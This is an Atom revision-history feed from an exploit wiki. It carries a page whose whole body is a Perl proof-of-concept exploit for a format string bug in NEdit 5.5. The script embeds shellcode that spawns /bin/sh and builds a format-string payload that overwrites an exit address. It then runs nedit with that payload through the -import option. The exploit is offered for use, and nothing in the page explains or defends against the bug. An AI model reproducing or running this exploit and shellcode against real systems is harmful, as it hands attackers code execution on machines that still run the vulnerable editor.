<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E</id>
	<title>NEdit 5.5 字符串格式化漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T22:31:11Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E&amp;diff=690&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Format string vulnerability in Nedit &lt;= 5.5. # Date: 04/13/2011 # Author: Tosh (The bug was already patched when I'd found the vuln) # Email: to...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NEdit_5.5_%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E&amp;diff=690&amp;oldid=prev"/>
		<updated>2021-03-27T02:56:48Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Format string vulnerability in Nedit &amp;lt;= 5.5. # Date: 04/13/2011 # Author: Tosh (The bug was already patched when I&amp;#039;d found the vuln) # Email: to...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Format string vulnerability in Nedit &amp;lt;= 5.5.&lt;br /&gt;
# Date: 04/13/2011&lt;br /&gt;
# Author: Tosh (The bug was already patched when I'd found the vuln)&lt;br /&gt;
# Email: tosh@tuxfamily.org&lt;br /&gt;
# Patch:&lt;br /&gt;
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&amp;amp;r2=1.160&amp;amp;view=patch&lt;br /&gt;
# Version: Nedit 5.5&lt;br /&gt;
# Tested on: FreeBSD 8.2-RELEASE&lt;br /&gt;
# CVE: don't found&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl -w&lt;br /&gt;
&lt;br /&gt;
use strict;&lt;br /&gt;
&lt;br /&gt;
my $exit_addr = 0x0815a86c;&lt;br /&gt;
&lt;br /&gt;
my $sc =&lt;br /&gt;
&amp;quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50&amp;quot;.&lt;br /&gt;
         &amp;quot;\x54\x53\xb0\x3b\x50\xcd\x80&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my (@payload) = (&amp;quot;./nedit&amp;quot;, &amp;quot;-import&amp;quot;, &lt;br /&gt;
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).&lt;br /&gt;
  &lt;br /&gt;
&amp;quot;%1021\$.8x-&amp;quot;.&amp;quot;%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n&amp;quot;&lt;br /&gt;
. $sc);&lt;br /&gt;
&lt;br /&gt;
exec(@payload);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>